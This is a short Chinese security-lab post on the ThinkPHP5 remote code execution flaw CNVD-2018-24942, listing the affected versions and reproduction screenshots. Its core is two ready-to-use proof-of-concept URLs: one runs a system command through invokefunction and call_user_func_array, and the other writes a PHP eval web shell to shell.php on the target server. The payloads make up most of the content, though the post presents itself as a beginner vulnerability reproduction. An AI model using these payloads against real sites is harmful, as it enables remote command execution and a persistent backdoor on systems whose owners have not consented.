CNVD-2018-24942
漏洞描述:ThinkPHP5存在远程代码执行漏洞。由于框架对控制器名称未能进行充分检测,攻击者可以利用该漏洞对网站进行远程命令执行(RCE)。
影响版本:
- 上海顶想信息科技有限公司 ThinkPHP 5.*,<5.1.31
- 上海顶想信息科技有限公司 ThinkPHP <=5.0.23
参考资料:
POC:
//远程代码执行
http://ip/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=pwd
//上传一句话
http://ip/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20@eval($_POST[pass])?%3E
漏洞复现
![图片[1]-【初级】ThinkPHP5远程代码执行漏洞-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/10/d2b5ca33bd234436-1024x660.png)
![图片[2]-【初级】ThinkPHP5远程代码执行漏洞-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/10/d2b5ca33bd234443-1024x660.png)
© 版权声明
部分文章采集于互联网,若侵权请联系删除!
THE END
请登录后查看评论内容